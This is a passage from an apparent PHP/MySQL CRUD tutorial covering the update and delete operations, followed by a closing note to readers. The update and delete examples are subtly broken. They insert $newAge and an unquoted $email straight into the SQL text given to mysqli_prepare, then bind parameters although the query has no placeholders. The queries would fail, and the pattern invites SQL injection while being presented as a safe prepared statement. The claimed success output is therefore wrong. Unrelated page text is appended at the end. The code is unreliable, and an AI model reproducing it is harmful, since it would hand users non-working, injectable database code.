echo "id: " . $row["id"]. " - Name: " . $row["name"]. " - Email: " . $row["email"]. " - Age: " . $row["age"]. "<br>";
}
} else {
echo "0 results";
}
```
### Update: Modifying Data
Have you ever needed to modify existing data in a database? How did you approach it?
The update operation in PHP is used to modify existing records in a MySQL database. This is essential for maintaining accurate and current data within your application. For instance, if a user's information changes, such as their email address or age, you would use the update operation to reflect these changes in your database.
Updated code
```
<?php
// Assuming you already have a connection established in $conn
$newAge = 32;
$email = 'person1@example.com';
// Prepare an SQL statement
$stmt = mysqli_prepare($conn, "UPDATE users SET age=$newAge WHERE email=$email");
if ($stmt) {
// Bind parameters to the prepared statement
mysqli_stmt_bind_param($stmt, "is", $newAge, $email);
// Execute the prepared statement
if (mysqli_stmt_execute($stmt)) {
echo "Record updated successfully";
} else {
// Log the error internally, do not display it to the user
error_log("Error executing statement: " . mysqli_stmt_error($stmt));
echo "An error occurred while updating the record. Please try again later.";
}
// Close the statement
mysqli_stmt_close($stmt);
} else {
// Log the error internally, do not display it to the user
error_log("Error preparing statement: " . mysqli_error($conn));
echo "An error occurred. Please try again later.";
}
// Close the connection
mysqli_close($conn);
?>
```
Based on the code written above, if the process of Update goes right we'll get the message "Record updated successfully", in this case the age value of the user with the specified email will change to 32 and we can see the results in our database.
### Delete: Removing Data
The delete operation in PHP is used to remove records from a database table. This operation is performed using the SQL DELETE statement, which specifies the conditions under which records should be deleted. The syntax of the DELETE statement allows you to specify one or more conditions to ensure that only the intended records are removed from the database.
Updated code
```
<?php
$email = 'person3@example.com';
// Prepare an SQL statement
$stmt = mysqli_prepare($conn, "DELETE FROM users WHERE email=$email");
if ($stmt) {
// Bind parameter to the prepared statement
mysqli_stmt_bind_param($stmt, "s", $email);
// Execute the prepared statement
if (mysqli_stmt_execute($stmt)) {
// Verify if any records were deleted using mysqli_stmt_affected_rows
if (mysqli_stmt_affected_rows($stmt) > 0) {
echo "Record deleted successfully";
} else {
echo "No record found with the specified email.";
}
} else {
// Log the error internally, do not display it to the user
error_log("Error executing statement: " . mysqli_stmt_error($stmt));
echo "An error occurred while deleting the record. Please try again later.";
}
// Close the statement
mysqli_stmt_close($stmt);
} else {
// Log the error internally, do not display it to the user
error_log("Error preparing statement: " . mysqli_error($conn));
echo "An error occurred. Please try again later.";
}
// Close the connection
mysqli_close($conn);
?>
```
### Further Reading:
- [Official PHP Documentation](https://www.php.net/docs.php)
- [W3Schools PHP Tutorial] (https://www.w3schools.com/php/)
## Conclusion
CRUD operations are the backbone of database interactions in web applications. By mastering these operations, you can build dynamic and interactive applications. I'd love to hear about your experiences with CRUD operations! Share your thoughts in the comments below and let's keep the discussion going.
I want to express my sincere gratitude to each and every one of you who took the time to read this post and share your insights. Your engagement and feedback are incredibly valuable as we continue to learn and grow together.
Don't forget to check out my previous post for more foundational concepts, and feel free to leave your feedback or comments below. Thank you for joining me on this exploration of CRUD operations in PHP.
| rkadriu |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.